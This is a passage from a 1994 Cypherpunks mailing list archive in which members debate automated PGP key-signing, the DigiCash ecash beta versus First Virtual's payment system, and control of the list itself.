Fri, 2 Dec 94 07:11:10 PST Subject: Cypherpunks@hks.net service In-Reply-To: <9412021408.AA21731@yeti.bsnet> Message-ID: <199412021609.IAA15568@largo.remailer.net> From: dmandl at bear.com What's next, automated key-signing services? Yep. There are two purposes to signing a key. The first is to fix a bit pattern and have an assurance that it hasn't changed. The second is to attest to the mapping between a key and some entity. PGP, for example, very explicitly does both. It asks you when you sign a key if you're sure that the person is who is advertised. I consider this behavior broken, not the least because it's hostile to pseudonymity. This hardcoded policy hinders the use of PGP in other contexts. For email-only social contact (i.e. legally uninvolved) the attestations of personal mapping are unnecessary and sometimes downright undesirable. Some people may want them, true, and there will be a need for that mechanism, but it should not be the only choice available. An automated key-signing server can affix a sequence of bits perfectly adequately. So can digital timestamping algorithms, but they are not generally available. Suppose the existence of just two auto-signing servers. I, a pseudonym, send my key to each of these servers and get back a two signatures on my key. It is unlikely now that someone can spoof my key. The distribution for the signing keys of these servers must be done right, but since there are fewer auto-signing servers than things signed, more effort can be taken to do this, for example, by publishing some hashcodes in a book. Eric From eric at remailer.net Fri Dec 2 07:19:32 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 2 Dec 94 07:19:32 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412021404.PAA18209@digicash.com> Message-ID: <199412021618.IAA15583@largo.remailer.net> From: "Paul Dinnissen" > The more I deal with Digicash, the better First Virtual looks. My > technical preference is for using Brands or Chaum cash; at present, > though, there aren't any shipping Brands servers, and the Digicash > folks don't seem to be able to get all their socks in one bag. We feel somewhat troubled by these comments. As well you should. The facts of the matter is that First Virtual currently provides a net benefit by moving real value (e.g. dollars) around, and Digicash does not. Until the Digicash system can move real value, there is no reason to use it. The technology is irrelevant. _If_ you can move real value, you can provide a benefit. _Only if_ you can move real value can you provide a benefit. Eric From eric at remailer.net Fri Dec 2 07:22:31 1994 From: eric at remailer.net (Eric Hughes) Date: Fri, 2 Dec 94 07:22:31 PST Subject: Authentication at toad.com: WTF? In-Reply-To: <9412010625.AA17536@anchor.ho.att.com> Message-ID: <199412021621.IAA15589@largo.remailer.net> From: wcs at anchor.ho.att.com (bill.stewart at pleasantonca.ncr.com +1-510-484-6204) Trusting someone else's verification is less than ideal security policy :-) But likewise, preventing folks from letting someone else (their legal agent) perform verification for them is a less than ideal political policy. There are going to be lots of good reasons (mostly of cost) to use agency relationship for security. It would be profitable to characterize the threats and come up with some solutions rather than to deny that these things will happen. Eric From db at Tadpole.COM Fri Dec 2 07:50:23 1994 From: db at Tadpole.COM (Doug Barnes) Date: Fri, 2 Dec 94 07:50:23 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412021404.PAA18209@digicash.com> Message-ID: <9412021548.AA17294@tadpole> A further reply to Mr. Robichaux, who I paraphrase, "The more I have problems with the DigiCash beta, the better First Virutal looks." Some problems with this: 1) It is, after all, a Beta Test. Many companies limit participation in such tests quite arbitrarily. Also, remember, DigiCash (to the best of my knowledge) is not going into the digital bank business itself, but rather through licensees. Aside from Paul, who is very PR oriented, it is primarily a group of quite talented young programmers who are, while answering your letters, trying to come out with new versions of the code. 2) A group of us went over the First Virtual stuff in detail last night over fajitas, and were practically rolling on the floor with laughter. Basically they have an attitude of "Crypto is too hard, people won't want to use it." So instead, each transaction consists of an e-mail exchange which is converted ultimately into credit card transactions The exposure time for the merchant is on the order of _90 days_. All fraud, etc., is on the head of the merchant. The bottom line here is that FV has a system which is much more sluggish than the DigiCash system, even though it doesn't use "hard" crypto. It is far from anonymous, and the transactions are trivially reversible. This is actually a _design goal_ in their "Soylent Green", er, "Simple Green" proposed standard. It is completely inappropriate for hard goods of significant value, and its minimum transaction cost is high enough to rule out its applicability for very small transactions. Even if used for purely informational goods, if an undercapitalized info service becomes popular, it will sink beneath the waves while waiting for payment. As near as I can tell, FV's technology was developed by people who wanted to implement their pet philosophy about Internet commerce (customer should examine info first, then commit to paying, all transactions reversible, cryptography and anonymity are bad, secure transactions are not possible on the net, etc.), rather than anything bordering on an Internet cash-like system. So, I ask, First Virtual is looking better and better for doing _what_? Until they deal with the interface problem (get a decent client, rather than relying exclusively on e-mail), I think they're not even going to be adequate for getting shareware-scale proceeds from putting up a cool Web page. From Richard.Johnson at Colorado.EDU Fri Dec 2 07:51:55 1994 From: Richard.Johnson at Colorado.EDU (Richard Johnson) Date: Fri, 2 Dec 94 07:51:55 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412021404.PAA18209@digicash.com> Message-ID: <199412021551.IAA23536@spot.Colorado.EDU> | We're sorry to hear any complaints about the handling of any requests for | information regarding ecash. As you can understand, we are certaintly not | planning to create unsatisied ecash users at the very start of the ecash endeavour. But, for the most part out here, we can't tell. I, too, have heard only deafening silence from e-cash folks in response to my multiple queries and requests for more information on their system, let alone joining their beta test. Like Hal Finney, I just assumed I was being ignored because I didn't have enough clout. As a result, I just gave up on e-cash as something I wouldn't find useful any time soon. I do understand the difficulties in dealing with releases on multiple platforms. Still, you might at least acknowledge e-mail from people who want to help make your system work, who want to use it. A form letter at least, explaining that you don't need their help right at the moment but will let them know when a system for their platform is being released for a wider beta test, well, that might be a real good idea. Ignoring people after you've publicly asked for beta testers and said "mail to <...> for further information" is definitely not a good idea. My count: 4 messages over about 6 months asking for more info, no replies. My reaction: Well, it was a nice idea. Maybe I'll check back in a couple of years, when there might actually be someone there. Rich PS - I'm not posting this to two lists because I've seen that's the only way to squeeze a response out of DigiCash, but you can be forgiven for thinking things like that. ;-) -- Loudyellnet: Richard Johnson | Sneakernet: ECNT1-6, CB 429, CU Boulder Phonenet: +1.303.492.0590 | Internet: Richard.Johnson at Colorado.EDU RIPEM and PGP public keys available by server, finger or request Speaker to avalanche dragons. Do you really think they listen? From perry at imsi.com Fri Dec 2 07:52:01 1994 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 2 Dec 94 07:52:01 PST Subject: The thread that would not die. (Mandating signatures) In-Reply-To: Message-ID: <9412021551.AA04657@snark.imsi.com> John Schofield says: > It is silly to talk of someone "owning" the list. The list is a > community. The only possible owners are the people in the community. If we > all left, Eric would still have control over the list--but the list would be > worthless. It is silly to talk of someone "owning" a restaurant. The restaurant is a community. The only possible owners are the people in the community. If the patrons all left, Chef Joey would still have control over the restaurant -- but the restaurant would be worthless. From bshantz at spry.com Fri Dec 2 08:19:29 1994 From: bshantz at spry.com (bshantz at spry.com) Date: Fri, 2 Dec 94 08:19:29 PST Subject: Paper available on new cipher Message-ID: <9412021615.AA00764@homer.spry.com> Hooray!!! Kudos to Matt for actually posting something outside of the tiresome "Eric Hughes is a lame-o" thread!!! (Which, by the way, I agree with Tim that it is a sign of health on the list. I would also like to say that I'm not going to post my opinion.) I intend to read and comment accordingly on the MacGuffin document. It's refreshing to see someone coding crypto. -- Brad <---- Begin Included Message ----> Bruce Schneier and I have been designing a block cipher, called "MacGuffin", based on a new variant of the standard Feistel (S-P) network structure. We are presenting a paper describing the cipher, entitled "The MacGuffin Block Cipher Algorithm", at the Leuven crypto algorithms workshop later this month. Here's the abstract: A forthcoming paper will discuss the characteristics GUFN structure in more detail. Comments and analysis greatly appreciated. -matt <---- End Included Message ----> >>>>>>>>>>>>>>>>INTERNETWORKING THE DESKTOP<<<<<<<<<<<<<<<<<< Brad Shantz bshantz at spry.com Senior Software Engineer Main #: (206)-447-0300 SPRY Inc. Direct #: (206)-442-8251 316 Occidental Ave FAX #: (206)-442-9008 2nd Floor Seattle, WA 98104 WWW URL: http://WWW.SPRY.COM ------------------------------------------------------------- >>>>>>>>>>>>>>>>>>>>>>>>>>>>><<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<< From werewolf at io.org Fri Dec 2 08:24:31 1994 From: werewolf at io.org (Mark Terka) Date: Fri, 2 Dec 94 08:24:31 PST Subject: First Virtual? Message-ID: -----BEGIN PGP SIGNED MESSAGE----- > From: "Paul Dinnissen" > > > The more I deal with Digicash, the better First Virtual looks. My > > technical preference is for using Brands or Chaum cash; at present, > > though, there aren't any shipping Brands servers, and the Digicash > > folks don't seem to be able to get all their socks in one bag. > > We feel somewhat troubled by these comments. > > As well you should. > > The facts of the matter is that First Virtual currently provides a net > benefit by moving real value (e.g. dollars) around, and Digicash does > not. Until the Digicash system can move real value, there is no > reason to use it. Ok, where do we E-Mail First Virtual to get some info to begin trying the concept out? Is there an automatic help file that can be sent or can we access it via ftp or WWW somehow? -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt9F5K+YbMzawbu5AQFo7AQAkzL2TId0Dqhqt8xnOjqgSnp8zXBFHBc0 Up356NwADzE/8/xnQlEMSMUAGjLLvnBE83KT8ko7H7RWc7HDieNxED6gtrmTO+uq HFcXi9hZMUywri4gG9vGWLQDa9bhpc5NEISQtzZCmPnbI4k+NtXnNRLDlPUvgxv8 BX+QK/trLnA= =RAiJ -----END PGP SIGNATURE----- -------------------------------------------------------------------------- Mark Terka | werewolf at io.org | public key (werewolf) by Toronto,Canada | dg507 at cleveland.freenet.edu | public key server or request --------------------------------------------------------------------------- From paul at poboy.b17c.ingr.com Fri Dec 2 08:25:24 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Fri, 2 Dec 94 08:25:24 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412021404.PAA18209@digicash.com> Message-ID: <199412021623.AA18739@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- Paul, I appreciate your reply, especially the information that I can use to reconstruct my account. I never received the mail that Branko originally sent. Evidently no one received my repeated requests sent after the first one. > Sometimes we can react very fast, but alas this is only the case for > standard procedures which we did automate. More specific questions > and requests *have* to be handled by humans. We think the people who are > willing to invest quite some effort in setting up a shop for the beta > test, are very important participants in the beta test trail. > Therefore it seems *very* unlike to us that we didn't respond to *any* > mail or request from you. Not trusting our own memory ( we do receive more > than 100 (yes, hundred) mails on ecash *each* day, even Sundays) > we dove right in to it and found a trail of DigiCash answers to your mail > with the subject: 'Concerns about ecash'. I was unclear in my original statement. You, Marcel, and others did respond to my comments and questions-- specifically to my concerns about when ecash systems would be available for real use. My upset came from the fact that once my shop stopped working, I didn't get a response. > > Since then, an accident on my WWW server has rendered the e-shop > > inoperable. I've asked Digicash, in the form of Paul Diniessen, for > > help reconstructing the bank records. No go. > Sorry we *did* sent you a respons within an hour from your > request by my colleague Branko. He is responsible for our bank in > the trial. His respons was: > -The dbm library used by Linux and FreeBSD are different, so the ecash > -databases are also incompatible. If you have a password for getting an > -initial balance, you can also use this password for reopening your > -account (and keeping your old balance). For the server at fairgate.com > -account you can use the password ******** (pw made invisible PD) for this. > - > -Branko > > > Of course, it may well be a matter of incompetence rather than insult, > > > but the net result is the same. The more I see of digicash's lack of > > > consideration towards their potential customers and important figures like > > > Brands the more I question whether they have the potential to succeed. > > > > The more I deal with Digicash, the better First Virtual looks. My > > technical preference is for using Brands or Chaum cash; at present, > > though, there aren't any shipping Brands servers, and the Digicash > > folks don't seem to be able to get all their socks in one bag. > We feel somewhat troubled by these comments. We strongly feel that > the alleged 'lack of consideration' as unjustified. First we would > like to split up your comment in to two different issues, first > regarding our potential customers and secondly the issue of Mr. S. > Brands. First of all, Hal Finney wrote the paragraph which mentions lack of consideration. My own feelings toward Digicash-- which you confirm-- are that you have more work to do than you can presently handle. I understand that; it's not uncommon, and I don't hold it against you. It _does_ hamper my ability to set up services for which I can be paid. > We like you to consider this phase in the existence of ecash as a > genuin beta trail. In beta test not only software is being trailed > but the supporting services too! However, it should be noted that we > did respond to your mail and requests. This is a good point. I do understand that this is a beta test, and that problems will occur. I also want to confirm for other readers that you did respond to my mail; in the most important case I didn't get the response. > We will give a call today to check if received this mail. We hope to > resolve the problems mentioned above and to continue our co-operation. Thanks for your detailed response. Regards, - -Paul Robichaux - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt9J/qfb4pLe9tolAQFABwP9FuFZvDeAzVlnFGqg5NwszbAoPN1IbV/2 SpD0bEdxbUkB+OdBCSkYgkcA0O/gU7MWFYNuJr062b8mwCBm5GLG8AGGq6dSYM+A Tfdq/oi1F+yrkDcvq7t6TMfLcgiynylAfVqv1c8+SHrMxXtHDJ5hLlqvfJ43m09S 2nsZTGVd01s= =rwxp -----END PGP SIGNATURE----- From jamesd at netcom.com Fri Dec 2 08:35:31 1994 From: jamesd at netcom.com (James A. Donald) Date: Fri, 2 Dec 94 08:35:31 PST Subject: Brands excluded from digicash beta In-Reply-To: <9412021548.AA17294@tadpole> Message-ID: <199412021635.IAA24295@netcom10.netcom.com> Doug Barnes writes > 1) It is, after all, a Beta Test. Many companies limit > participation in such tests quite arbitrarily. Also, > remember, So send out a form letter: "Thank you for your interest. At the moment we are not seeking beta testers with your kind of hardware. We will contact you when when further news happens. " I have applied three times, and received no response whatever. If you cannot manage a form letter, your business is unlikely to go anywhere. Sell or lease the patents to someone who can manage a mailing list. > So, I ask, First Virtual is looking better and better for doing > _what_? For answering their mail. For acting in accordance with their business plan. For moving money from point A to point B. Ninety percent of success is showing up on time. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From paul at poboy.b17c.ingr.com Fri Dec 2 08:43:56 1994 From: paul at poboy.b17c.ingr.com (Paul Robichaux) Date: Fri, 2 Dec 94 08:43:56 PST Subject: Brands excluded from digicash beta In-Reply-To: <9412021548.AA17294@tadpole> Message-ID: <199412021638.AA19202@poboy.b17c.ingr.com> -----BEGIN PGP SIGNED MESSAGE----- > A further reply to Mr. Robichaux, who I paraphrase, "The more I > have problems with the DigiCash beta, the better First Virutal > looks." Doug, you must be talking to my dad; he's Mr. Robichaux. Having inadvertently offended the Digicash people in my previous message, let me see if I can give equal time to what's wrong with FV in this message. > Some problems with this: > 1) It is, after all, a Beta Test. Many companies limit > participation in such tests quite arbitrarily. Also, > remember, DigiCash (to the best of my knowledge) is > not going into the digital bank business itself, but > rather through licensees. Aside from Paul, who is very > PR oriented, it is primarily a group of quite talented > young programmers who are, while answering your letters, > trying to come out with new versions of the code. Maybe it's just me. As a beta-shop owner, I expect to have Digicash work with me when I have problems, concerns, or questions. Marcel, Paul, and others at Digicash were very helpful during the incubation period. My chief concern at this point is that there's no way for me to get paid, and no publicly available date for same. I didn't suggest that Stefan Brands, or anyone else, was being denied access to the trial. I have no evidence to suggest any explanation for his complaint, Hal Finney's, or mine-- other than that the Digicash folks are very, very busy. > 2) A group of us went over the First Virtual stuff in detail > last night over fajitas, and were practically rolling on > the floor with laughter. Basically they have an attitude > of "Crypto is too hard, people won't want to use it." So > instead, each transaction consists of an e-mail exchange > which is converted ultimately into credit card transactions > The exposure time for the merchant is on the order of _90 > days_. All fraud, etc., is on the head of the merchant. I think their attitude is that crypto's not _necessary_. I disagree; Nathaniel Borenstein has already been taken to task on www-buyinfo for that view. Their API supports TCP/IP transactions, so the mail exchange is between the FV server and the buyer. The very fact that FV has a set of terms and conditions that mention exposure time, responsibility for fraud, and so on tells me that their system is more fully fielded. I know, I know; ecash is in beta. That's fine. I still want to be able to sell things _now_. > The bottom line here is that FV has a system which is > much more sluggish than the DigiCash system, even though > it doesn't use "hard" crypto. It is far from anonymous, and > the transactions are trivially reversible. This is actually > a _design goal_ in their "Soylent Green", er, "Simple Green" > proposed standard. It is completely inappropriate for hard > goods of significant value, and its minimum transaction cost > is high enough to rule out its applicability for very small > transactions. Even if used for purely informational goods, > if an undercapitalized info service becomes popular, it will > sink beneath the waves while waiting for payment. All of the above is true. You can't use FV for hard goods, the minimum transaction cost rules out microtransactions, and the payment hang time is too long. On the other hand, I can't use ecash for hard goods. I have no idea what the transaction costs will be, and there's no way for sellers to get paid _at all_. > As near as I can tell, FV's technology was developed by people > who wanted to implement their pet philosophy about Internet > commerce (customer should examine info first, then commit to > paying, all transactions reversible, cryptography and anonymity > are bad, secure transactions are not possible on the net, etc.), > rather than anything bordering on an Internet cash-like system. You're right here, too. I happen to agree with the portion about allowing try-before-you-buy access; in some cases that is a very valuable way to gain market and mindshare. Remember the "Macintosh Test Drive" in 1985? > So, I ask, First Virtual is looking better and better for doing > _what_? Until they deal with the interface problem (get a decent > client, rather than relying exclusively on e-mail), I think > they're not even going to be adequate for getting shareware-scale > proceeds from putting up a cool Web page. Not. Read their web pages. There's a TCP/IP API, which I'm using. The only mail exchange is from the FV server to the customer and back again. As Hal pointed out, there are valid reasons to support systems other than the Digicash e-wallet. After all, there will be offline ecash, right? First Virtual's chief advantage is that I can get paid. No fooling with clearing, scalability, or anything else-- people can buy my products. - -Paul Robichaux - -- Paul Robichaux, KD4JZG | Good software engineering doesn't reduce the perobich at ingr.com | amount of work you put into a product; it just Not speaking for Intergraph. | redistributes it differently. ### http://www.intergraph.com ### -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQCVAwUBLt9NY6fb4pLe9tolAQFYgAP8C5KfpLyvpqv5KVEquMKIKC+HOgWcOLKt dCc5sW55toRwrNBihALPFy4p40Fi8uZclIUgcNTyICnogof0WzSAnkAv+GRq8Ear ePuqqEQX0N1iWFaLlvIxVt4ALrtic4lE8O4GhE/xEl2ecBz5UR6haieGJDAhW4k4 kJZTMyAgKNI= =nDr0 -----END PGP SIGNATURE----- From rmccoy at mercury.interpath.net Fri Dec 2 09:06:57 1994 From: rmccoy at mercury.interpath.net (rmccoy at mercury.interpath.net) Date: Fri, 2 Dec 94 09:06:57 PST Subject: ECO_do Message-ID: <199412021711.MAA15082@bb.hks.net> -----BEGIN PGP MESSAGE----- Version: 2.6.2 owEBWQCm/4kARQMFAC7fVUcqGc8CJ9W3bQEBftkBgNi8riTLJAuBf/hCkbdRicFy PTPzF712eXT/MuB4TrzU97Dga24NH0ievt1kjZqZnawPYgliYWFhMTUwNzgAAAAA =7wNp -----END PGP MESSAGE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From jamesd at netcom.com Fri Dec 2 10:03:54 1994 From: jamesd at netcom.com (James A. Donald) Date: Fri, 2 Dec 94 10:03:54 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412012201.AA08104@poboy.b17c.ingr.com> Message-ID: <199412021801.KAA02052@netcom8.netcom.com> Paul Robichaux writes > I'm sure that the design of a robust, usable [clearing] system > is nontrivial, and I don't mean to imply that it is. I just > don't believe that a tool the size of Fedwire and the existing > bank architectures are, or will be, required. The tools will be vastly simpler and smaller than Fedwire, etc but the system will be vastly larger an more complex than Fedwire etc, because "the system" will consist of many diverse people using these tools in diverse ways for diverse purposes. Attempts to design an all encompassing well organized system run counter to the way the internet works and are therefore likely to fail. If it does not work by spontaneous order, it probably will not work. Regrettably, there is an obvious conflict between full and true anonymity, and spontaneous order. On the other hand, absent a centralized system, anonymity is less critical. -- --------------------------------------------------------------------- We have the right to defend ourselves and our property, because of the kind of animals that we James A. Donald are. True law derives from this right, not from the arbitrary power of the omnipotent state. jamesd at acm.org From vvallopp at eniac.seas.upenn.edu Fri Dec 2 10:12:01 1994 From: vvallopp at eniac.seas.upenn.edu (vvallopp at eniac.seas.upenn.edu) Date: Fri, 2 Dec 94 10:12:01 PST Subject: ECO_do Message-ID: <199412021817.NAA15624@bb.hks.net> -----BEGIN PGP MESSAGE----- Version: 2.6.2 owEBWQCm/4kARQMFAC7fZIgqGc8CJ9W3bQEB4KoBfiMUs2jPnVVoze7+Hm0GT6mc tDTwXfvs+Wt+jhhvFql0tAC4hrVXoJ5aXlOu78g9FKwPYgliYWFhMTU2MjAAAAAA =WGc6 -----END PGP MESSAGE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From cjl at welchlink.welch.jhu.edu Fri Dec 2 10:36:08 1994 From: cjl at welchlink.welch.jhu.edu (cjl) Date: Fri, 2 Dec 94 10:36:08 PST Subject: ECO_do In-Reply-To: <199412021456.JAA08818@pipe1.pipeline.com> Message-ID: >From the messages appearing on the list it would seem that responding to messages sent via Masco's auto-signer needs to be done carefully, apparently the less-than-less diligent will just respond to the From: address instead of to the automagical response demon at jya at pipeline.com I would hate to see the valuable service provided by jya become a source of noise. In an ideal world everyone would be more careful about responding to the right address, but this is a far from ideal world. An appropriately Cypherpumpkin solution is left as an excercise to the reader. C. J. Leonard ( / "DNA is groovy" \ / - Watson & Crick / \ <-- major groove ( \ Finger for public key \ ) Strong-arm for secret key / <-- minor groove Thumb-screws for pass-phrase / ) From abostick at netcom.com Fri Dec 2 10:36:44 1994 From: abostick at netcom.com (Alan Bostick) Date: Fri, 2 Dec 94 10:36:44 PST Subject: Easy-to-use signature software Message-ID: -----BEGIN ROT13 SIGNED MESSAGE----- People who aren't yet able to securely use PGP to post to the cypherpunks mailing list, take heart. Eric has indicated that he doesn't care which flavor of encryption software you use. I have a user-friendly version of the encryption algorithm most widely used on the Internet. I haven't uploaded it to any FTP sites yet, but if you email me, I can send you a copy of the source code. -----BEGIN ROT13 SIGNATURE----- Version 2.71828 V jebgr guvf zrffntr. Abobql ryfr qvq. Nalbar jub fnlf bgurejvfr vf n yvne. Guvf uvtu-grpu qvtvgny fvtangher vf gur cebbs bs zl pynvz. nobfgvpx at argpbz.pbz (Nyna Obfgvpx) -----END ROT13 SIGNATURE----- | For me, to be a feminist is to answer the Alan Bostick | question "Are women human?" with a yes. abostick at netcom.com | finger for PGP public key | Katha Pollitt, REASONABLE CREATURES Key fingerprint: | 50 22 FB 46 41 A3 17 9D F7 33 FF E1 4E 1C 89 79 +legal_kludge=off From db at Tadpole.COM Fri Dec 2 10:48:17 1994 From: db at Tadpole.COM (Doug Barnes) Date: Fri, 2 Dec 94 10:48:17 PST Subject: Brands excluded from digicash beta In-Reply-To: <199412021638.AA19202@poboy.b17c.ingr.com> Message-ID: <9412021847.AA21243@tadpole> > > Maybe it's just me. As a beta-shop owner, I expect to have Digicash > work with me when I have problems, concerns, or questions. Marcel, > Paul, and others at Digicash were very helpful during the incubation > period. My chief concern at this point is that there's no way for me > to get paid, and no publicly available date for same. There have clearly been problems in communication and in expectation-setting. In particular, since DigiCash is not, to the best of my knowledge, planning on entering the US$ cash <--> ecash business themselves (instead, using licensees), it might have been a wise move for them to set expectations lower or to have taken steps to guarrantee at least a trial US$ cash <--> ecash gateway. > I think their attitude is that crypto's not _necessary_. I disagree; > Nathaniel Borenstein has already been taken to task on www-buyinfo for > that view. Their API supports TCP/IP transactions, so the mail > exchange is between the FV server and the buyer. If you've used the DigiCash clients, you know that they make it much, much easier to spend money than this e-mail confirmation system. Since they don't use crypto (and instead rely on the debatable assumption than an e-mail backchannel is secure, backed up by extreme reversability). This is not to say that someone couldn't remedy these problems along the same lines as DigiCash without using blind signatures or licensing from Chaum, however. > > The very fact that FV has a set of terms and conditions that mention > exposure time, responsibility for fraud, and so on tells me that their > system is more fully fielded. I know, I know; ecash is in beta. That's > fine. I still want to be able to sell things _now_. > FV may be more operational, although I'm curious if any transactions have managed to fully settle yet... yes, it is important for the operator of a US$ cash->ecash gateway to consider fraud and exposure, but the _protocol_ determines that e-cash transactions are non-reversible, like putting coins into a vending machine. The gateway operator has to either use non-reversible US$ inputs, or needs to determine an acceptable level of exposure to reversible transactions. The two systems are worlds apart in terms of where the risk is placed. FV places the risk entirely on the vendor; DigiCash places the risk entirely on the e-cash holder. Note that lots of people walk around with credit cards, bills _and_ coins in their wallets, and use them for different things throughout the day. I don't think that things are going to be that different on the net. > On the other hand, I can't use ecash for hard goods. I have no idea > what the transaction costs will be, and there's no way for sellers to > get paid _at all_. This is absolutely true, and will remain so until at least one of Chaum's licensees becomes operational. > I happen to agree with the portion about > allowing try-before-you-buy access; in some cases that is a very > valuable way to gain market and mindshare. Remember the "Macintosh > Test Drive" in 1985? I think that if people want try before you buy, it can be done (easily) without building it into the payment protocol. I'm all for shareware, giving freebies so folks get hooked, and so forth, but it seems odd to build a unconditional rejection into the payment system, especially for products that can't be returned in any meaningful sense. > Not. Read their web pages. There's a TCP/IP API, which I'm using. The > only mail exchange is from the FV server to the customer and back > again. As Hal pointed out, there are valid reasons to support systems > other than the Digicash e-wallet. After all, there will be offline > ecash, right? I think that it is _vital_ to have e-mail and TCP/IP versions, don't get me wrong here! I _have_ read the web pages, and I note that you still have to pop into your e-mail to approve the purchase. This is an inherent flaw to the protocol, that there will be 2-3 user-side software components, instead of 1-2 with DigiCash: FV: browsing software, paying software, confirming software DC: browsing software, full payment software I'm assuming that over time, the TCP/IP payment methods will be integrated into browsing software, but FV will always be hampered by the need to have something separate to handle the back-channel, since they are religiously opposed to using signatures for validation (although you suggest some progress in this area). > > First Virtual's chief advantage is that I can get paid. No fooling > with clearing, scalability, or anything else-- people can buy my > products. > You get paid (in ninety days), so great, use it today if you can get your users to use it. Keep your eyes open for tomorrow. You may end up getting actually paid by another method before the payments you receive today actually settle... From anonymous-remailer at shell.portal.com Fri Dec 2 11:00:24 1994 From: anonymous-remailer at shell.portal.com (anonymous-remailer at shell.portal.com) Date: Fri, 2 Dec 94 11:00:24 PST Subject: pgp / passphrase / capture / yikes! Message-ID: <199412021900.LAA29951@jobe.shell.portal.com> just wondering , if i use pgp on my pc , and lets say while on my unix connection to the net i shell to dos to do encryption or decryption , does this compromise my security in any way ? can some admin catch my passphrase, i don think so , but i'm really fucken paranoid ! thanks for any answers felloe punks ! -feast oh , msg to larry detweiler : your really looney man , cracked me up ! :*) From owner-cypherpunks at hks.net Fri Dec 2 11:02:17 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Fri, 2 Dec 94 11:02:17 PST Subject: The thread that would not die. (Mandating signatures) Message-ID: <199412021907.OAA16118@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article <9412021551.AA04657 at snark.imsi.com>, Perry E. Metzger wrote: > >John Schofield says: >> It is silly to talk of someone "owning" the list. The list is a >> community. The only possible owners are the people in the community. If we >> all left, Eric would still have control over the list--but the list would be >> worthless. > >It is silly to talk of someone "owning" a restaurant. The restaurant >is a community. The only possible owners are the people in the >community. If the patrons all left, Chef Joey would still have control >over the restaurant -- but the restaurant would be worthless. You continue to confuse (deliberately?) a community with the place it meets. "List" is being used in two senses -- and you continue to interpret it only as the instance of majordomo on toad.com. That's a worthless interpretation as nobody disputes that Eric controls that agent. As far as I'm concerned, if a message has gone out to every address on the "cypherpunks" list, I don't give a shit whether or not it went through toad.com first: it went to cypherpunks. - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBFAwUBLt9v/CoZzwIn1bdtAQFY6gGA0EVd9/2BIoe5ORzfPePZxxoA7WJs/jkm PEMkdRGJNpih+x6xLOnlv2+BoBTdEXgj =Qrv2 -----END PGP SIGNATURE----- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address belonging to the signature and forwarded.] From pays at faugeres.inria.fr Fri Dec 2 11:24:08 1994 From: pays at faugeres.inria.fr (pays at faugeres.inria.fr) Date: Fri, 2 Dec 94 11:24:08 PST Subject: Brands excluded from digicash beta Message-ID: <786396213.22515.0-faugeres.inria.fr*@MHS> I just want, in a short message, let you know that there exist some satisfied ecash testers (the system itself and the support when we set-up our digishop and our plain customers cyberwallets). The only thing I could eventually complain about is that I even received a second (unsollicited) account Id and password to retrieve ecash software because of a bug in the requests management :-) -- PAP From perry at imsi.com Fri Dec 2 11:25:32 1994 From: perry at imsi.com (Perry E. Metzger) Date: Fri, 2 Dec 94 11:25:32 PST Subject: The thread that would not die. (Mandating signatures) In-Reply-To: <199412021907.OAA16118@bb.hks.net> Message-ID: <9412021925.AA04969@snark.imsi.com> owner-cypherpunks at hks.net says: > Perry E. Metzger wrote: > > > >John Schofield says: > >> It is silly to talk of someone "owning" the list. The list > >> is a community. The only possible owners are the people in the > >> community. If we all left, Eric would still have control over > >> the list--but the list would be worthless. > > > >It is silly to talk of someone "owning" a restaurant. The restaurant > >is a community. The only possible owners are the people in the > >community. If the patrons all left, Chef Joey would still have control > >over the restaurant -- but the restaurant would be worthless. > > You continue to confuse (deliberately?) a community with the place it meets. You continue to confuse the way the mailing list functions with the people that use it. The question of whether Eric can require that all subscribers to the list wear blue mud smeared over their faces at all times is what we are discussing -- that is, does he have proprietary control over the way the list is run. The list is run with resources he has been granted dominion over. It appears that he's completely free to take any action he likes. You are, of course, free to sugges that he not do so, and you are also free to stop using his resources in disgust. This has been driven into the ground, so I won't continue it. However, I would suggest that all the people who think Eric doesn't have absolute control here attempt to figure out how to impose any rule or regulation without his consent, or how to stop him from implementing anything without your consent. (The fact that Eric has no interest in ruining the list and that we would prefer that he not wreck it is immaterial, by the way -- he is free to do so if he desires to, and that is what counts.) From owner-cypherpunks at hks.net Fri Dec 2 11:25:42 1994 From: owner-cypherpunks at hks.net (owner-cypherpunks at hks.net) Date: Fri, 2 Dec 94 11:25:42 PST Subject: ECO_do Message-ID: <199412021930.OAA16477@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- In article , cjl wrote: >From the messages appearing on the list it would seem that >responding to messages sent via Masco's auto-signer needs to be done >carefully, apparently the less-than-less diligent will just respond to the >From: address instead of to the automagical response demon at >jya at pipeline.com No longer. I removed this last night, since MUAs don't agree on what they do with "Reply-To:". (The behavior I was trying to encourage is that of following up only to the list. Netcom lossage notwithstanding, I hate being CC'd on things that I'll see anyway.) - -- Todd Masco | "Roam home to a dome, Where Georgian and Gothic once stood cactus at hks.net | Now chemical bonds alone guard our blond(e)s, cactus at bb.com | And even the plumbing looks good." - B Fuller -----BEGIN 